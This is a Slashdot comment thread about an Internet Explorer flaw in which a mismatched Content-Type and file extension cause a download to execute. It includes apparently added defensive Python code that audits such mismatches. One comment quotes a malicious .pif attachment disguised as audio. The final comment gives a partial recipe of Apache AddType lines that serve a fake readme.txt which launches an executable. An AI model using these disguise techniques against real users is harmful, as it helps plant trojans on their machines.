The original article clearly states that people have been very secretive about the details. For example, it says that the details weren't mailed to Bugtraq at one point, and also that the select few who were given a demo apparently all signed NDAs first.
What I'd like to know is, how is michael getting all the "inside info" he'd need to justify his comments? What is his source? Unless he's got information he didn't mention, his article appears to be nothing but anti-MS FUD. If he does have that information, why didn't he post it, on a board as skeptical as Slashdot?
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
"Now Microsoft has a problem. Because they chose to ignore the standard for handling downloaded files, Microsoft has painted themselves into a corner."
I think you guys got this backwards. It seems to me that everyone else is going against the standard by not doing it the Microsoft way. I mean, these guys embrace and extend! Everyone else is just sticking with the old standards, while Microsoft is blazing new ones 8^}
"Microsoft
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
Michael :
>Type may be innocuous, but the extension says "execute me", so when
>the "integrated" IE engine gets ahold of it, the malicious content
>is automatically executed.
>If you routinely browse with Internet Explorer or read mail with
>Outlook, keep in mind that any web page you visit or any email you
>open can take over your computer, steal sensitive files, destroy
>your machine, anything.
I like Slashdot lots, and read it pretty much every time I have net access (most work days +).
Still, it saddens me that poorly considered, or even deliberately misleading rants like this still slip through as editorial content.
For this item : 2/10, must try harder.
Simon Hibbs
I think this is the same flaw they actually patched on the Mac OS X version of IE...
Dang, wrong OS.
Bad things happen to stupid people all the time, just check out rotten.com.
If you think it's normal to blindly click "ok" on that dialog that comes up asking you to either download or execute something, then it's going to happen to you too.
...and maybe after you get ripped by a virus or some other malicious code you'll learn your lesson.
I think it's funny that the people who think this is a valid article are the same ones bashing the lion and lamb garbage...it's the same damn thing.
second society
I use Opera and sometimes Mozilla. I have both set to identify as "MSIE 5.0" so I can go to those "Designed for Microsoft only" sites. Anyway, I am sure that this type of thing throws off the stats a bit, doesn't it?
If somebody wants to sue, they'll contact a real lawyer and be advised from there.
God I hate idiots like glrotate.
Is IE. To say it's anything else is short sighted and borders on tunnel vision.
Using NT4/IE5 and it tried to open with WinZip as it normally would have a ZIP file. Except, of course, WinZip couldn't read it. Your file never got executed.
You can accomplish anything you set your mind to. The impossible just takes a little longer.
By "completely open" they mean you have to click on an EXE, download it, and choose to open it! WOW what a vulnerability!!! OH NO! Opera and Mozilla are also vulnerable!!! Ye gods what do we do now?!
Prevent linux based DDOS's!
http://linux.denialofservice.org/
So is this worse than the Linux wu_ftp bug that was hidden by obscurity?
Seems like that was worse since the exploit didn't require user assistance.
Thanks to Red Hat though for telling us so we can patch our machines. Too bad the GPL public review didn't catch that problem for so long. Ditto for Bind, SendMail...
this is not a sig
I have to use IE at work. There is absolutely no alternative.
The proxy software that was recently put in place uses Windows Authentication to let you through. Basically this entails logging into the proxy using your NT userid/password - all of which is sent automagically by IE. Without this the proxy won't let you through, not even for DNS.
So no, I don't have a choice.
What really sucks is that because of this proxy, there's no ways out of the network either. If I want to telnet to a box out on the net, I can't do it - even if the box has sshd listening on port 80, 119, etc. putty can't connect because it can't get through the proxy.
who's the moderator who called the original post "flaimbait"?
That was a valid response. He likes Opera... hell, I like Opera. And he's correct that the Opera UI with the gesture movements gets addictive. I'll hop on a computer using IE and I find myself trying to go back into history using the right click gesture method.
Opera is a great browser (I personally prefer 5 instead of 6).
Someone mod the parent (or mine to get some attention) up. Mod me down for being an ass if you want but moderation like that, on a valid post is uncalled for.
www.slightlycrewed.com - Because aren't we all?
Staying off the security vulnerability side of things, IE's non-conformance to the standard way of determining file type has irritated me for some time. Here's why:
The HTTP standards dictate that the Content-type: header contains the MIME type of the data which follows. Netscape accepts this; any standards compliant browser does this. IE, however, looks at the filename extension (and even the data itself) and makes decisions based on that.
This means that if I write some HTML, put it in a file called "text.html", then configure my browser to serve it with "content-type: text/plain", the right thing for a browser to do would be to display the HTML source as text. Some versions of IE think they're far too clever to fall for that one, and just render it as HTML anyway.
(1): What if I *want* to read the HTML source?
But more importantly than (1), I've seen proper production servers misconfigured in this way -- don't ask me why, so HTML content is sent with the wrong Content-type header. If the site is tested with IE only, everything will appear to be fine; only when you try and browse the site with another browser does the fault show up.
Now, what's a non-technical web user going to think when they see this? Are they going to think "Hmm, the server is set up wrong"? No, if it works in IE but not in Netscape, they're going to think "Netscape sucks!", and merrily continue using IE.
This despite the fact that IE is the one that's behaving wrongly.
I won't go as far as to suggest that this behaviour was put in as a deliberate ploy, but if someone else wanted to, I wouldn't argue with them...
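The disagreement this post describes, as an added example (not code from the thread): three file-type policies run side by side over constructed responses. `type_from_header` is the HTTP way (Content-Type only), `type_from_extension` is the local-file way (trailing extension only), and `type_from_sniff` is a small mime-magic style guesser. `assess` runs all three and flags the combinations the thread argues about: an executable extension under a text Content-Type, HTML sniffed out of a text/plain response, and Win32 executable bytes under a .txt name. The extension table and the sniffing rules are my own constructed approximations, not IE's or Apache's.

```python
"""Three ways a client can decide what a served file 'is', side by side.

Added example, not code from the thread. The lookup table and the sniffing
rules are constructed approximations, kept small enough to read.
"""
import os

# Constructed lookup table standing in for the Windows registry's
# extension-to-type mapping. application/x-msdownload is the type Apache's
# mime.types uses for Windows executables.
EXT_TABLE = {
    ".txt": "text/plain", ".html": "text/html", ".htm": "text/html",
    ".wav": "audio/x-wav", ".zip": "application/zip", ".pdf": "application/pdf",
    ".exe": "application/x-msdownload", ".bat": "application/x-msdownload",
}
# Extensions the Windows shell hands to the loader or the command interpreter.
EXECUTABLE_EXTENSIONS = {".exe", ".bat", ".cmd", ".com", ".pif", ".scr"}


def type_from_header(content_type):
    """Policy 1 (the HTTP way): trust Content-Type, dropping any parameters."""
    media = content_type.split(";", 1)[0].strip().lower()
    return media or "application/octet-stream"


def last_extension(filename):
    """Only the final extension counts: foo.pdf.exe is an .exe."""
    return os.path.splitext(filename)[1].lower()


def type_from_extension(filename):
    """Policy 2 (the local-file way): decide by the trailing extension."""
    return EXT_TABLE.get(last_extension(filename), "application/octet-stream")


def type_from_sniff(body, window=256):
    """Policy 3 (mime-magic style): guess from the first bytes of the body."""
    head = body[:window]
    if head.startswith(b"MZ"):                         # DOS/PE executable stub
        return "application/x-msdownload"
    if head.startswith(b"RIFF") and head[8:12] == b"WAVE":
        return "audio/x-wav"
    if head.startswith(b"PK\x03\x04"):
        return "application/zip"
    if b"<html" in head.lower() or b"<!doctype html" in head.lower():
        return "text/html"
    if all(32 <= c < 127 or c in (9, 10, 13) for c in head):
        return "text/plain"
    return "application/octet-stream"


def assess(content_type, filename, body):
    """Run all three policies and flag the disagreements that matter."""
    verdicts = {
        "header": type_from_header(content_type),
        "extension": type_from_extension(filename),
        "sniff": type_from_sniff(body),
    }
    ext = last_extension(filename)
    risks = []
    if ext in EXECUTABLE_EXTENSIONS and verdicts["header"] != verdicts["extension"]:
        risks.append("executable extension behind a non-executable Content-Type")
    if verdicts["sniff"] == "text/html" and verdicts["header"] != "text/html":
        risks.append("a sniffing client renders this as HTML against the declared type")
    if verdicts["sniff"] == "application/x-msdownload" and ext not in EXECUTABLE_EXTENSIONS:
        risks.append("Win32 executable bytes under a non-executable file name")
    verdicts["consistent"] = len({verdicts["header"], verdicts["extension"], verdicts["sniff"]}) == 1
    verdicts["risks"] = risks
    return verdicts


# Constructed samples mirroring the cases argued over in the thread.
SAMPLES = {
    "html_as_text": ("text/plain; charset=iso-8859-1", "text.html", b"<html><body>hi</body></html>"),
    "bat_as_text": ("text/plain", "a.bat", b"@echo off\r\necho hello\r\n"),
    "exe_named_txt": ("application/octet-stream", "b.txt", b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56),
    "honest_zip": ("application/zip", "report.zip", b"PK\x03\x04" + b"\x00" * 26),
}

if __name__ == "__main__":
    for label, (ctype, name, body) in SAMPLES.items():
        print(label, assess(ctype, name, body))
```

Only `honest_zip` comes back consistent; the other three each carry exactly one flagged risk, which is the practical point: a server that sends the correct Content-Type is only safe for clients that honour it, so a defender checking a site's responses wants all three verdicts to agree, not just the header to be right.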
and how is this patch going to get on people's machines the don't know how to install a friggin operating system? they just double-click on the blue "e" on the desktop and type where they want to go - presto after a few minutes of dialing the page shows up. patches are great for people who are aware enough. Nimda, code red, etc all had patches BEFORE or just shortly after the virus hit. why did it then infect tons of computers, annoy almost every single web server log file, and continue for months? m$ software is intended for an audience of people who don't know jack about computers, and in that respect they should be held legally and financially obligated to provide bullet-proof software. NN and others are intended for those who know better so should be exempt. any other industry which identifies a bug in its product issues a public recall of the product to correct the problem (say a finds that it had a line of DVD's that the laser was set too high at the factory, those would be recalled yesterday)
File extensions seem to me to be a safer way to manage filetypes - on any Mac OS prior to X all you had to do to fool a user into running a spoofed program was to change the filename extension and icon (say, make an application with a .jpg extension and a quicktime image file icon). The os runs the file based on the actual file type and creator codes when it is double-clicked, and those codes are typically invisible to the user, so someone could very easily open a malicious program instead of, say, some downloaded pr0n.
.jpg will always be opened as a .jpg, even if it's just a renamed .exe
At least with file extensions as the absolute identification of file type you can't be tricked (ignoring the method discussed in this article), and a
You may be able to make IE behave better by tagging a Content-Disposition header along in your HTTP response.
It's not in the HTTP spec, but is a proper MIME header (http://www.oac.uci.edu/indiv/ehood/MIME/rfc2183.txt).
IE sometimes takes note of Content-Disposition's 'filename' parameter to figure out what extension jiggery-pokery it should call.
I say sometimes, because you can still run up against IE deciding that the first few hundred bytes of your file look like HTML so *obviously* the file is html, regardless of content-type, content-disposition, filename and untold sacrifices to the gods *sob!*
Realize that IE is insecure and start moving everything that matters out of reach. It's not like the patch for this will fix all the yet to be discovered holes. Cheap trick is Find all the *script* thingees and delete/change their names. Changing names is probably better just in case someone really needs the function.
It may not be totally correct, but we all love to bash Microsoft. I would much rather read a completely wrong article about how crap Microsoft is, than a technically correct piece of MS PR about how they give money to lots of poor kids.
This comment does not represent the views or opinions of the user.
You *only* test on beta software (IE6) ?!?
And you do this for a living?!?
Of course not, you dimwit. It goes like this:
1. Implement a feature.
2. Test it on my workstation (Win2000, IE6)
3. Shit, there's a bug.
4. Fix the bug.
5. Test it on my workstation-- better now.
6. Submit change to QA for "real" testing.
Sheesh.
If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything. This has been true for at least two and half years
Actually, this has been true since the first personal PC was put on the market, probably longer.
Once again, I am forced to point out the fact that it is an uneducated user who will cause the compromise of the system. Personally, I NEVER "Open file from location". You never know what it is that you are downloading, so I always save it to disk first, and then examine it.
Any user who "Opens from location" without knowing for a fact what the file is, and that the site can be trusted, is acting stupidly.
Hmmm... Also, someone can use any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything ? Really, they can send the "Overload CPU" command and cook my processor? (Must be a linux command, my Win2K machine doesn't have it.) They can give me Anthrax? "Oh, no! Not the Thrax!" (-Butters, South Park) That "anything" is a little broad, don't you think?
Come on guys, I would expect this in the Enquirer, but not on /.
"Da ist ein Technölüst in mein Unterpanten!"
The deal is that you have a file ending in ".EML" with some MIME trickery in it, served up by any HTTP server. IE thinks it's an e-mail message and unpacks it. Inside is an executable (name ending with
The magic MIME trickery looks like this:
I have mod points today but I've just gotta post here. In the interests of full disclosure, I run Windows 2000 Server on my main development box and Windows XP Pro on my personal/multimedia box. I'm quite pleased with both. I also run RedHat and Slackware distros at various client sites as gateways, mail and web servers, etc. Best tool for the job, right?
Anyway, the point is, I don't (nor do my clients) surf as root/administrator. If we remember our lessons from "Computing 101" we run our day to day tasks as a regular user with the most restrictive set of permissions that allow us to do our jobs effectively. For the vast majority of these locally exploitable holes (worms, viruses, etc.) we can only damage our personal documents (which are backed up periodically and stored offline).
I'm not gonna take sides in the great "Microsoft is evil" debate today. I just hope more people will follow my lead and remember the basics.
BRENT ROCKWOOD, EST'd 1975
It really is hard for them. Older teachers in particular like the computer to look the same every time they use it, or they get confused. When I worked at my high school over the summer, I was told repeatedly not to allow any variation in desktop performance, so as not to confuse teachers or students. When you spend a lot of time of /., it becomes hard to believe, but a lot of people are simply not computer literate at all.
I'm the stranger...posting to
I have worked with several sites that pass files through CGI scripts to the user. Because all the web masters I have worked with are from a unix background, we've never cared about the extension. Files over the web should be passed and parsed by content-type, right?
There has been bug after bug dealing with content-type and extension in Internet Explorer. They PRE-DATE the fuller integration of IE into the operating system, although that integration worsened them. Every time a problem is reported to Microsoft, they fix the specific problem, not the underlying problem. Thus, you can change your tactics a little and create another "exploit".
I'm not at all surprised that a destructive exploit has been created. Most iterations of the problem that I've experienced have come from attempts to correctly serve valid data to IE users--in most of those cases, the browser was simply unable to correctly identify/render the files. I could see possibilities for destructive exploits, but because my field is communications, not white hatting, I really wasn't in a [mental/academic] place to experiment with them. Unless Microsoft fixes the UNDERLYING PROBLEM, which allows Internet Explorer to incorrectly interpret by extension in some cases thus ignoring content-type, they are going to continue to see exploits. Even I know that the mixture of two standards is far worse than following either one or the other--and opens the program to far more exploits. Why can't Microsoft learn that?
Geez, Michael, wth is your problem? All your articles are either wrong or have so much FUD in them it's not funny.
IE6 is a big junk anyways. I completely gave up on it.
Even though I'm running XP, it forced me to get Netscape and fortunately for me this issue won't affect me.
They constantly create security holes in there products which could allow terrorists to disrupt American business. And, as we all know "if you're not against the terrorists, you're with them". Therefore, MS should be prosecuted under anti-terrorism statutes for this - let's see if that works better than the anti-monopoly statutes.
I also don't think that donating a lot of terrorist-aiding computers to American schools is going to help them much, either.
Clue me in on a few things, monkeyboy Michael:
1.) Did you bother to test this "flaw"?
2.) Did you bother to get independent verification the "flaw" exists, and can be exploited?
3.) Did you bother to search for any evidence that the "flaw" has been, or is being, exploited?
4.) Do you have even the slightest bit of journalist integrity?
I suspect that the answer to all the above questions is "No."
Michael, you're an idiot. You have an uncontrollable case of "diarrhea of the keyboard." Your ridiculous ranting drips with stinky, runny shit.
Tell me, monkeyboy, had you found out about this flaw in Konqueror or Galeon or Mozilla, would you have ranted on in the same manner? Of course not; those products aren't made by Microsoft, therefore they aren't "EVIL!!!!" If this flaw existed (or does exist) in any other non-MS browser, well, you'd just say that it was a minor bug that was going to be fixed "real soon now."
However, since the flaw reportedly exists in IE, it's obviously a horrible conspiracy by Bill Gates and his Microsoft cronies to destroy everything that is sacred! They pissed on Mom's apple pie! By God, they'll be killing puppies next! They must be stopped!
Looks like it's time to take advantage of Slashdot's filtering features again. I've already filtered out articles by Jon Katz, and anything to do with anime (I don't care for anime). Time to add monkeyboy Michael to the list.
Not surprising that Slashdot's filters work so much better than Slashdot's editors.
"The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
I don't know what agenda I'm trying to push. I work in a MS shop and my programming resume is very MS focused. I have a lot to lose if Linux catches on very far. I don't even have it installed on my home machine right now. I don't think you are stupid or that you're trying to tell fibbies.
What I'm saying is that Slashdot used to be nothing but nerds - the clear Linux focus meant that only a certain kind of people came around. Now it seems everyone comes around - and there's little focus. And as more of the general populace comes in, some of the old nerds (who said things that interested me) leave.
I think it's great that Slashdot is more balanced in its coverage of MS now. But its bad that I have to read through a lot more things I don't find interesting. Moderation has become very predictable - moderators waste their points on safe targets like obvious trolls and "long comments with lots of links that sound intelligent". Sometimes I think they're just trying to get by without being meta'ed down.
I'm not saying that non-Linux nerds are stupid. I'm just saying that the crowd that Slashdot used to attract said things that were more interesting to me.
Let's not stir that bag of worms...
No surprise that Micro-Soft was so very vocal about putting an end to Information Anarchy.
They must have seen this one coming....
In the course of every project, it will become necessary to shoot the scientists and begin production.
- However, to exploit the vulnerability, "attackers would probably need control of a Web server so that they could control the information sent in the HTTP header," Wysopal said. As a result, attacks could be traced to the malicious site.
Reading this one would think, "Oh, no problem. What webmaster would create a trackable exploit?" (ignore comp-u-geek for a moment). Add this exploit to wide-open server crack Code Red2/ Nimda...you've got a clear way for a third party to cause a *huge* disaster.
My logs are *STILL* full of Code Red 2 and Nimda attacks (running Apache, so I don't care). How long until these OpenDoor servers are "patched" with the malformed MIME header exploit?
-- @rjamestaylor on Ello
No one should be publishing what the bug is and how it's employed. To state that Microsoft is obscuring the information is an uninformed comment brought on by juvenile hysterics and ad hominem Microsoft bashing. Get a clue, you moron.
You can demand anything you want, but have you considered that he is entitled to his own opinion?
If the low UIDs and zealots want to keep the blinders on
And what is wrong with zeal? Having a low UID indicates a person saw and recognized a good thing long before everyone else jumped on the bandwagon.
First let me say I am in no way a microsoft advocate. I run exclusively Free software at home, but the place I work is a microsoft shop.
Actually scripting is used a great deal in many companies. We use e-mail forms with a lot of scripting behind them to make many things easier. For instance the helpdesk has a form that forces users to enter certain information before they can report trouble tickets. It's a lot easier than dealing with an e-mail that simply states my screen looks funny. We have another that allows users to check the size of their mailboxes on the exchange server. We couldn't do any of this without scripting. These are just a couple of examples, but there are many uses for the features built into outlook. If people would actually try to learn more than a basic user's amount of knowledge before they come on here and bitch about how bad things are they wouldn't come across as being a bunch of idiots. But what can you expect from the average IT "professional"?
If you've never worked with scripting in outlook, buy a book, you may be impressed with what you can hack together with a form. If you have and don't like it, then disable it. It's not that hard.
If Microsoft doesn't patch their bugs for us, or remove/make optional features/bugs of their operating system for us, we'll write programs that do.
Hell, I don't start IE6 without a copy of Pop Up Stopper by Panicware, since I can't turn off pop up windows like I can in Mozilla. And the really bright ones among us don't use anything but litestep :)
So who wants to start a betting pool on how long it'll take Microsoft to start lawsuits against programs like these?
***JUMP PAD ACTIVATION INITIATION START***
***TRANSPORT WHEN READY***
... set content type to "audio" and fed executable instead with pif or vbs extension. Dumb IE rendering engine EXECUTED IT WITHOUT *ANY* PROMPT!
:)
Lucky me! Just a day before this virus hit our company, I switched to Opera for e-mails too.
...If you are at all surprised by this. No, Bill, you don't count.
Don't you get that feeling that some of these people are former TeamOS/2 ers?
Sure, the part about 'Microsoft doing what's best for Microsoft' is a little bit of a personal tiff, but at least it's true. But dude, if you're going to claim that Microsoft isn't going to release a patch, at least link to a site that supports your claim. There's nothing like giving out false information, and then saying "Verify it with this guy", who says "What? He's full of shit."
Christ, How many Slashdot editors are there? And how many items are actually posted? At least read what you're posting. (And maybe spellcheck once in a while)
"I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatantly stolen sig)
??? Well, I haven't used the Mac for several years now, but this sound like eliminating one of the central strengths that the Mac had.
I suppose that Darwin implied changes, but I've always thought that the Mac resource fork (and file signatures: Application and file type specified separately) were a great source of strength and stability to the system. (Granted, they added a layer of complexity, required additional tools, etc.) I can think of several different, but logically equivalent, ways to merge that information into a ext2 file system (basically via the use of hidden files), so I don't see any reason that it should be a problem. After all, their UI sits well on top of the *nix underpinning, so their utilities could automatically open/copy/move/delete/etc. both files whenever the user used one. I guess that file signatures were the sticky part, but combined together they were only 64 bits (and letters at that), so it would be easy to just say the first line of the file was the signature (not elegant, but this is a shoe-horn job -- and that's basically what the #! line does, so the metaphor translates).
The Mac's weaknesses were (are):
1) It was one of the first GUI designs, so there are a lot of bumps, and places where it had to be patched. And it's relatively difficult for programmers.
2) It costs more than an equivalent PC.
3) It is sole sourced.
... That seems to be pretty much it.
Note that 1 and 3 are sources of strength as well as being weaknesses. But I think that over time they have become weaknesses.
The true strength of the Mac was that there was a good design behind the GUI, with careful attention given to all parts. Compare the use of command keys in the Apple GUI with the clumsy use of accelerator keys in Windows (I rarely bother) and Linux (well, I should learn to use them before I comment too harshly here, but I've been using Linux for 3 years now, and still don't use any of the accelerator keys).
I think we've pushed this "anyone can grow up to be president" thing too far.
"Don't you get that feeling that some of these people are former TeamOS/2 ers? "
You mean people like Nicholas Petreley and Joe Barr? No! Not possible!
Why the hell is Microsoft so dependent on file extensions anyways? How about looking at that nice glob of header at the beginning of most file formats to determine what it is. Or, my favourite way is to let the user figure out what their files are. File extensions are an archaic way of determining what the file is. I should be able to have an avi file with a txt extension and still be able to play it in Windows Media Player (shiver, painful program, painful interface, oh woe is me).
Oh well, everyone needs to gripe about something. At least all of the unix systems don't rely on file extensions, I can have solace there.
--- I used to moderate, then I read the -1 articles and decided having to filter through them was not worth it.
From the article:
"Microsoft will patch a flaw in its Web browser...
Yes, that's correct.
From the article's intro:
"Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever."
OK, I'm still waiting for you to make a point...
Hint: they still didn't say WHEN; Sure, they've said they WILL, but they didn't give any information about when the patch will be available.
Looks like the article intro is correct.
I like IE better than Netscape. IE tends to be a little bit faster than Netscape. Netscape tends to be unable to load many web pages that IE loads with ease. Netscape also freezes up all the time. I run both on my computer. IE may have huge security gaps, but I just don't really care.
If you don't understand any of my sayings, come to me in private and I shall take you in my German mouth.
[Scene: Historical tour of the Web, 2053]
[Commentator: "And here we have another example of an irrational, intellectually empty text contribution to the website known as 'Slashdot.org' It was commonly referred to as a 'pro-Microsoft rant', something that occurred more and more frequently after the website became increasingly popular. It was said that the increased popularity attracted more Microsoft 'fanboys' and ultimately led to its demise.]
[Audience. Sound of digital cameras taking pictures]
I ran into an interesting passport issue today.
When you create a hotmail account, it also creates a passport account as well. But, after that initial creation, the 2 accounts are not tied together.
Hotmail will disable any account that hasn't been accessed in 60 days, BUT, it does not disable the passport account at the same time. So, if I create an account with hotmail, and use it mainly as a passport for buying stuff on websites, and I don't check my hotmail account for a while, it gets disabled. The problem is, I can still use that login to access passport.
Now, the even bigger problem, is that someone else can go to hotmail, and create the same account that I did (because mine was disabled) and the new password they chose for the hotmail account will affect the passport account. So, in essence, I just got my passport account stolen from me.
And with stuff like this going on, they really want me to use passport. I really don't have a problem with entering my credit card info manually, if it is going to stop people from stealing stuff, or using the card without my knowledge.
Anyway, I'm sure we will see more of this in the future, I hope the best for the liberty alliance..
I was developing a web application that would serve out a chunk of opaque data for the user to save on their hard drive. So I set the Content-Type to "application/octet-stream" and the "filename" in the URL was foo.yai which is a totally bogus extension, right? Well it just so happened that the actual content of the data was XML. But not only that, it was XML saved as a UTF String so that it had this two-byte header on it which indicated how long the UTF String was.
Clicking on the link that generated this file worked fine on all browsers but IE, of course. You would click on it and all other browsers would properly show the user the "Save As..." dialog. IE looked at the file and determined that it was XML (even without an xml extension!) and not only that, it was so bold as to tell me that my XML was mis-formatted because of this 2-byte header at the beginning of the file! So it started its embedded syntax-highlighted XML viewer that it has and then stops and says "Misformatted XML, unknown characters before the <xml> tag...". Gimme a break!
The "workaround" was to set the Content-type to X-Made-Up-Content-Type-To-Fool-Stupid-IE and it decided that this was something that should receive the "Save as..." dialog, as did the other browsers, thankfully.
So I'm not at all surprised that someone found this vulnerability with IE being so bold as to guess the content-type when it is set to application/octet-stream and start doing whatever it wants to based on its guess.
And have you ever noticed that IE gets the extension from the last thing in the URL _even_ if it's a query string? So if you have a URL like http://www.foo.bar/download?e=greg@yahoo.com
then the filename it will try to save is "download.com". And of course .com is an executable as far as Windows is concerned. Brilliant.
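An added example (my own, not code from any poster here): a small Python audit of what filename a download actually ends up with, first via the Content-Disposition filename / Content-Type name lookup that the earlier Content-Disposition post leans on, and otherwise via the URL-tail rule this post describes (modelled from the description, not a documented IE rule), then flagging names whose extension is executable while the declared type claims something innocuous. The host example.invalid and all sample headers are constructed.

```python
"""Audit a download's effective filename against its declared Content-Type.

Constructed example for this thread. The URL-tail rule (base name from the
path, extension from the last dot anywhere in the tail, query string
included) is a model of the behaviour a poster describes, not a documented
rule; the header lookup order (Content-Disposition filename, then
Content-Type name) is what email.message.Message.get_filename() implements.
"""
import re
from email.message import Message

# Extensions the thread mentions as executable or auto-run on Windows.
EXECUTABLE_EXTENSIONS = {"exe", "com", "bat", "pif", "vbs", "dll"}

# Top-level types a user reads as harmless. An executable extension under
# one of these is the Content-Type / extension disagreement the thread is about.
INNOCUOUS_MAINTYPES = {"text", "audio", "image", "video"}


def filename_from_url(url: str) -> str:
    """Model of deriving a save-as name from the URL tail, query included."""
    tail = url.split("#", 1)[0].rsplit("/", 1)[-1]
    base = tail.split("?", 1)[0]          # name comes from the path part
    if "." in base:
        base = base.rsplit(".", 1)[0]
    ext = ""
    if "." in tail:                        # extension from the LAST dot in the whole tail
        m = re.match(r"[A-Za-z0-9]+", tail.rsplit(".", 1)[1])
        ext = m.group(0) if m else ""
    return f"{base}.{ext}" if ext else base


def _as_message(headers: dict) -> Message:
    msg = Message()
    for name, value in headers.items():
        msg[name] = value
    return msg


def effective_filename(url: str, headers: dict) -> str:
    """Header-declared name if there is one, else the URL-derived model name."""
    declared = _as_message(headers).get_filename()
    return declared if declared else filename_from_url(url)


def extension_of(filename: str) -> str:
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def audit_download(url: str, headers: dict) -> dict:
    """Report the name, extension and whether headers and name tell different stories.

    Header-only: it cannot see the body, so a genuine .exe served as readme.txt
    with text/plain is invisible here. Content sniffing is a separate problem.
    """
    msg = _as_message(headers)
    content_type = msg.get_content_type() if "Content-Type" in msg else None
    maintype = content_type.split("/", 1)[0] if content_type else None
    filename = effective_filename(url, headers)
    ext = extension_of(filename)
    executable = ext in EXECUTABLE_EXTENSIONS
    return {
        "filename": filename,
        "extension": ext,
        "content_type": content_type,
        "executable": executable,
        # "harmless" type in the headers, "run me" in the filename
        "mismatch": executable and maintype in INNOCUOUS_MAINTYPES,
    }


def safe_download_headers(filename: str) -> dict:
    """Headers that tell one consistent story: opaque bytes, saved under this name."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # strip any path
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)            # no quotes, CR or LF
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{name}"',
    }


if __name__ == "__main__":
    # Constructed sample responses, including the query-string case from the post.
    samples = [
        ("http://www.foo.bar/download?e=greg@yahoo.com", {"Content-Type": "text/plain"}),
        ("http://example.invalid/getfile",
         {"Content-Type": 'audio/x-wav; name="New_Napster_Site.MP3.pif"'}),
        ("http://example.invalid/download?e=greg@yahoo.com", safe_download_headers("foo.yai")),
    ]
    for url, hdrs in samples:
        print(audit_download(url, hdrs))
```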
The old IE executable *.gif has been known for years now.
Cnn is reporting Yet another Very Big and Annoying hole has been found at microsoft. To quote the reporter, "The Annoying Hole was found to be nothing other than Steve Ballmer's Big Mouth" Microsoft says they are in the process of working on a patch, but also commented "How do you stop verbal diarrhea?"
"All I can tell the "lesser of two evils" folks is that if they keep voting for evil, they'll keep getting evil."-Lp.org
Maybe this sounds stupid, but I use Gozilla or DAP to download my stuff in MSIE. I just use MSIE for those "only IE sites"; another thing, try Netscape 4.79 because it opens more "IE sites". Anyway, it is better to *save* all files to disk and never let any program execute them.
Read the original post closely:
.exe files are text/plain ... in which case you get the prompt, and then Windows opens the executable in Notepad.
.txt files are application/octet-stream ... in which case they are still displayed as text in your browser.
IE handles files in an odd mish-mash of looking at the Content-Type sometimes for some purposes, looking at file extension sometimes for some purposes. It's hardly surprising that the bug-hunter in the above story has found a way to feed it a Content-Type at odds with the file extension - the Content-Type may be innocuous, but the extension says "execute me", so when the "integrated" IE engine gets ahold of it, the malicious content is automatically executed.
Where is the exploit in this? Any user with half a brain (not many, I know) will see that this supposed text file ends with ".exe" or something. That's a trigger right there.
AFAICT, IE relies solely on the file extension when deciding whether or not to execute a file.
You can try and tell it that
The only way I can think of making this work would be to change the MIME types on the client machine (i.e. Explorer > Tools > Folder Options > File Types). And I'm pretty damn sure that's not possible via plain-Jane HTML.
Tuus crepidae innexilis sunt.
All viruses are not worms.
All operating systems are not created equal.
All birds cannot fly.
Um... where was I?
I click that link. It says "you have chosen to download text.txt, would you like to open it or save it" etc.
So I choose "open it" and then it gives me another dialog: "you have chosen to download calc.exe, would you like to run it or save it"
So if this example doesn't exploit a vulnerability in IE, then "Opera is vulnerable too" is a non-sequitur. How can it be vulnerable if IE isn't vulnerable in the first place?
The following sentence is true. The preceding sentence was false.
While I was reading this article I found someone had sent a message to my hotmail account with the following in it:
Content-Type: audio/x-wav; name="New_Napster_Site.MP3.pif"
I opened it in notepad and it's an .exe file.
Kind of makes a mockery of hotmail's claims to scan all email for viruses with mcafee...
graspee
petitiononline sends you an ad when you use their service.
-- dieman - Scott Dier
I don't understand the difference between file extensions and metadata. If you set your file to be application/exe (or whatever an executable format is) then how is that different from making it a .exe (in the windows world).
It seems to me that as long as data files (such as .txt or /text) can be executed, the problem will exist.
Or maybe I just don't understand the problem...
Thought I'd inform you as well :)
IE 5.50.4522.1800 with SP1 and all the critical updates.
Just tries to open it in winzip.
The following sentence is true. The preceding sentence was false.
In the second, binary only scenario, the PITA of reverse engineering ensures that a much smaller # of both white and black hats will attach themselves to the problem, and J-Random-tinkerer can't contribute at all. You've made it less likely that some "bad" person will use the bug to hurt you, but you've also made it less likely that some "good" person will find it and help you avoid or minimize the damage from the "bad" person's discovery.
My point is, security is a gamble. You are always gambling that there are no bugs in your program that some bad person is going to discover and exploit to harm you. "Security through Obsurity" is the wishful thinking strategy; it seeks to minimize the # of people who find the bugs, and then hope that those people are only the "good guys." Open Source and full disclosure are the "hedge your bets" strategies. They seek to maximize the number of people who find the bug, hoping that at least *one* of them is one of the good guys.
Purely statistically speaking, which do you think is likely to be more successful?
It's too bad that news like this doesn't surprise me anymore. Further negligence by Microsoft isn't going to be attacked, but accepted. Now that is scary. --theKiyote
Simply put a 'text' file on MSN which is actually the patch. Users don't even have to know they've been patched.
(Which makes me wonder, was this security hole left in to allow the installation of magic lantern and similar software...)
- You don't know how to maintain a station wagon either!
Little "x" ?! More like a giant red cross taking up half of the screen on XP.
this is too easy, I am not a programmer (unless html counts) but I do have an Apache/PHP setup and was able to test this out. get php to process .txt files in your php.conf file like so:
AddType application/x-httpd-php .php .php4 .php3 .phtml .txt
AddType application/x-httpd-php-source .phps
then create a whatever.txt file like so:
put the readme.txt file in your webroot, along with the exe file you want to execute.
user gets: "you've chosen to download readme.txt..." and picks "open from current location"
instead calc.exe is executed as evidenced by the calculator opening on my workstation when I tested it.
dude this is way too easy. Someone who is a programmer could easily display a text document in addition to installing a rootkit/virus/trojan, and end user would be none the wiser.
